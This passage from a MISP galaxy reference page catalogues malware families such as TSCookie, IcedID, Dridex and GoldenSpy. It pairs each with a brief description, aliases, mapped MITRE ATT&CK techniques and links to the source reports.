uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1426" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Application Discovery - T1418" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Location Tracking - T1430" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1406" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Access Contact List - T1432" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Capture SMS Messages - T1412" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Code Injection - T1540" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Access Call Log - T1433" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Uncommonly Used Port - T1509" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1422" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Standard Application Layer Protocol - T1437" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Keychain - T1579" with estimative-language:likelihood-probability="almost-certain"

Table 5038. Table References
Links
https://attack.mitre.org/software/S0463
https://www.volexity.com/blog/2020/04/21/evil-eye-threat-actor-resurfaces-with-ios-exploit-and-updated-implant/

TSCookie - S0436

[TSCookie](https://attack.mitre.org/software/S0436) is a remote access tool (RAT) that has been used by [BlackTech](https://attack.mitre.org/groups/G0098) in campaigns against Japanese targets.(Citation: JPCert TSCookie March 2018)(Citation: JPCert BlackTech Malware September 2019). [TSCookie](https://attack.mitre.org/software/S0436) has been referred to as [PLEAD](https://attack.mitre.org/software/S0435) though more recent reporting indicates a separation between the two.(Citation: JPCert PLEAD Downloader June 2018)(Citation: JPCert BlackTech Malware September 2019)

The tag is: misp-galaxy:mitre-malware="TSCookie - S0436"

TSCookie - S0436 is also known as:

TSCookie

View relationships graph

TSCookie - S0436 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Malicious Link - T1204.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Proxy - T1090" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Injection - T1055" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Non-Application Layer Protocol - T1095" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

Table 5039. Table References
Links
https://attack.mitre.org/software/S0436
https://blogs.jpcert.or.jp/en/2018/03/malware-tscooki-7aa0.html
https://blogs.jpcert.or.jp/en/2019/09/tscookie-loader.html

EnvyScout - S0634

[EnvyScout](https://attack.mitre.org/software/S0634) is a dropper that has been used by [APT29](https://attack.mitre.org/groups/G0016) since at least 2021.(Citation: MSTIC Nobelium Toolset May 2021)

The tag is: misp-galaxy:mitre-malware="EnvyScout - S0634"

EnvyScout - S0634 is also known as:

EnvyScout

View relationships graph

EnvyScout - S0634 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Execution Guardrails - T1480" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Forced Authentication - T1187" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="JavaScript - T1059.007" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Hidden Files and Directories - T1564.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Masquerading - T1036" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="HTML Smuggling - T1027.006" with estimative-language:likelihood-probability="almost-certain"

Table 5040. Table References
Links
https://attack.mitre.org/software/S0634
https://www.microsoft.com/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/

OceanSalt - S0346

[OceanSalt](https://attack.mitre.org/software/S0346) is a Trojan that was used in a campaign targeting victims in South Korea, United States, and Canada. [OceanSalt](https://attack.mitre.org/software/S0346) shares code similarity with [SpyNote RAT](https://attack.mitre.org/software/S0305), which has been linked to [APT1](https://attack.mitre.org/groups/G0006).(Citation: McAfee Oceansalt Oct 2018)

The tag is: misp-galaxy:mitre-malware="OceanSalt - S0346"

OceanSalt - S0346 is also known as:

OceanSalt

View relationships graph

OceanSalt - S0346 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Non-Standard Encoding - T1132.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"

Table 5041. Table References
Links
https://attack.mitre.org/software/S0346
https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-oceansalt.pdf

Peppy - S0643

[Peppy](https://attack.mitre.org/software/S0643) is a Python-based remote access Trojan, active since at least 2012, with similarities to [Crimson](https://attack.mitre.org/software/S0115).(Citation: Proofpoint Operation Transparent Tribe March 2016)

The tag is: misp-galaxy:mitre-malware="Peppy - S0643"

Peppy - S0643 is also known as:

Peppy

View relationships graph

Peppy - S0643 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Automated Exfiltration - T1020" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"

Table 5042. Table References
Links
https://attack.mitre.org/software/S0643
https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf

AuditCred - S0347

[AuditCred](https://attack.mitre.org/software/S0347) is a malicious DLL that has been used by [Lazarus Group](https://attack.mitre.org/groups/G0032) during their 2018 attacks.(Citation: TrendMicro Lazarus Nov 2018)

The tag is: misp-galaxy:mitre-malware="AuditCred - S0347"

AuditCred - S0347 is also known as:

AuditCred
Roptimizer

View relationships graph

AuditCred - S0347 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Proxy - T1090" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Injection - T1055" with estimative-language:likelihood-probability="almost-certain"

Table 5043. Table References
Links
https://attack.mitre.org/software/S0347
https://blog.trendmicro.com/trendlabs-security-intelligence/lazarus-continues-heists-mounts-attacks-on-financial-organizations-in-latin-america/

Avenger - S0473

[Avenger](https://attack.mitre.org/software/S0473) is a downloader that has been used by [BRONZE BUTLER](https://attack.mitre.org/groups/G0060) since at least 2019.(Citation: Trend Micro Tick November 2019)

The tag is: misp-galaxy:mitre-malware="Avenger - S0473"

Avenger - S0473 is also known as:

Avenger

View relationships graph

Avenger - S0473 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1518.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Injection - T1055" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Steganography - T1027.003" with estimative-language:likelihood-probability="almost-certain"

Table 5044. Table References
Links
https://attack.mitre.org/software/S0473
https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf

Kivars - S0437

[Kivars](https://attack.mitre.org/software/S0437) is a modular remote access tool (RAT), derived from the Bifrost RAT, that was used by [BlackTech](https://attack.mitre.org/groups/G0098) in a 2010 campaign.(Citation: TrendMicro BlackTech June 2017)

The tag is: misp-galaxy:mitre-malware="Kivars - S0437"

Kivars - S0437 is also known as:

Kivars

View relationships graph

Kivars - S0437 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Remote Services - T1021" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Hidden Window - T1564.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 5045. Table References
Links
https://attack.mitre.org/software/S0437
https://blog.trendmicro.com/trendlabs-security-intelligence/following-trail-blacktech-cyber-espionage-campaigns/

SpeakUp - S0374

[SpeakUp](https://attack.mitre.org/software/S0374) is a Trojan backdoor that targets both Linux and OSX devices. It was first observed in January 2019. (Citation: CheckPoint SpeakUp Feb 2019)

The tag is: misp-galaxy:mitre-malware="SpeakUp - S0374"

SpeakUp - S0374 is also known as:

SpeakUp

View relationships graph

SpeakUp - S0374 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Network Service Scanning - T1046" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Password Guessing - T1110.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Standard Encoding - T1132.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exploitation for Client Execution - T1203" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Cron - T1053.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1049" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Python - T1059.006" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

Table 5046. Table References
Links
https://attack.mitre.org/software/S0374
https://research.checkpoint.com/speakup-a-new-undetected-backdoor-linux-trojan/

Attor - S0438

[Attor](https://attack.mitre.org/software/S0438) is a Windows-based espionage platform that has been seen in use since 2013. [Attor](https://attack.mitre.org/software/S0438) has a loadable plugin architecture to customize functionality for specific targets.(Citation: ESET Attor Oct 2019)

The tag is: misp-galaxy:mitre-malware="Attor - S0438"

Attor - S0438 is also known as:

Attor

View relationships graph

Attor - S0438 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Hidden Files and Directories - T1564.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Automated Collection - T1119" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Logon Script (Windows) - T1037.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Application Window Discovery - T1010" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Checks - T1497.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Multi-hop Proxy - T1090.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Shared Modules - T1129" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Asynchronous Procedure Call - T1055.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Transfer Protocols - T1071.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Automated Exfiltration - T1020" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Injection - T1055" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Timestomp - T1070.006" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Clipboard Data - T1115" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Archive via Custom Method - T1560.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Audio Capture - T1123" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Peripheral Device Discovery - T1120" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Masquerade Task or Service - T1036.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Asymmetric Cryptography - T1573.002" with estimative-language:likelihood-probability="almost-certain"

Table 5047. Table References
Links
https://attack.mitre.org/software/S0438
https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Attor.pdf

IcedID - S0483

[IcedID](https://attack.mitre.org/software/S0483) is a modular banking malware designed to steal financial information that has been observed in the wild since at least 2017. [IcedID](https://attack.mitre.org/software/S0483) has been downloaded by [Emotet](https://attack.mitre.org/software/S0367) in multiple campaigns.(Citation: IBM IcedID November 2017)(Citation: Juniper IcedID June 2020)

The tag is: misp-galaxy:mitre-malware="IcedID - S0483"

IcedID - S0483 is also known as:

IcedID

View relationships graph

IcedID - S0483 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Asynchronous Procedure Call - T1055.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Asymmetric Cryptography - T1573.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domain Account - T1087.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Browser Session Hijacking - T1185" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Permission Groups Discovery - T1069" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Msiexec - T1218.007" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Software Packing - T1027.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Steganography - T1027.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"

Table 5048. Table References
Links
https://attack.mitre.org/software/S0483
https://securityintelligence.com/new-banking-trojan-icedid-discovered-by-ibm-x-force-research/
https://blogs.juniper.net/en-us/threat-research/covid-19-and-fmla-campaigns-used-to-install-new-icedid-banking-malware

Dridex - S0384

[Dridex](https://attack.mitre.org/software/S0384) is a prolific banking Trojan that first appeared in 2014. By December 2019, the US Treasury estimated [Dridex](https://attack.mitre.org/software/S0384) had infected computers in hundreds of banks and financial institutions in over 40 countries, leading to more than $100 million in theft. [Dridex](https://attack.mitre.org/software/S0384) was created from the source code of the Bugat banking Trojan (also known as Cridex).(Citation: Dell Dridex Oct 2015)(Citation: Kaspersky Dridex May 2017)(Citation: Treasury EvilCorp Dec 2019)

The tag is: misp-galaxy:mitre-malware="Dridex - S0384"

Dridex - S0384 is also known as:

Dridex
Bugat v5

View relationships graph

Dridex - S0384 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Proxy - T1090" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Browser Session Hijacking - T1185" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote Access Software - T1219" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Asymmetric Cryptography - T1573.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Software Discovery - T1518" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Multi-hop Proxy - T1090.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious File - T1204.002" with estimative-language:likelihood-probability="almost-certain"

Table 5049. Table References
Links
https://attack.mitre.org/software/S0384
https://www.secureworks.com/research/dridex-bugat-v5-botnet-takeover-operation
https://securelist.com/dridex-a-history-of-evolution/78531/
https://home.treasury.gov/news/press-releases/sm845
https://research.checkpoint.com/2021/stopping-serial-killer-catching-the-next-strike/

GoldenSpy - S0493

[GoldenSpy](https://attack.mitre.org/software/S0493) is a backdoor malware which has been packaged with legitimate tax preparation software. [GoldenSpy](https://attack.mitre.org/software/S0493) was discovered targeting organizations in China, being delivered with the "Intelligent Tax" software suite which is produced by the Golden Tax Department of Aisino Credit Information Co. and required to pay local taxes.(Citation: Trustwave GoldenSpy June 2020)

The tag is: misp-galaxy:mitre-malware="GoldenSpy - S0493"

GoldenSpy - S0493 is also known as:

GoldenSpy

View relationships graph

GoldenSpy - S0493 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Non-Standard Port - T1571" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Account - T1136.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Time Based Evasion - T1497.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Compromise Software Supply Chain - T1195.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

Table 5050. Table References
Links
https://attack.mitre.org/software/S0493
https://www.trustwave.com/en-us/resources/library/documents/the-golden-tax-department-and-the-emergence-of-goldenspy-malware/

HiddenWasp - S0394

[HiddenWasp](https://attack.mitre.org/software/S0394) is a Linux-based Trojan used to target systems for remote control. It comes in the form of a statically linked ELF binary with stdlibc++.(Citation: Intezer HiddenWasp Map 2019)

The tag is: misp-galaxy:mitre-malware="HiddenWasp - S0394"

HiddenWasp - S0394 is also known as:

HiddenWasp

View relationships graph

HiddenWasp - S0394 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="RC Scripts - T1037.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Non-Application Layer Protocol - T1095" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Account - T1136.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Uncommonly Used Port - T1065" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Rootkit - T1014" with estimative-language:likelihood-probability="almost-certain"
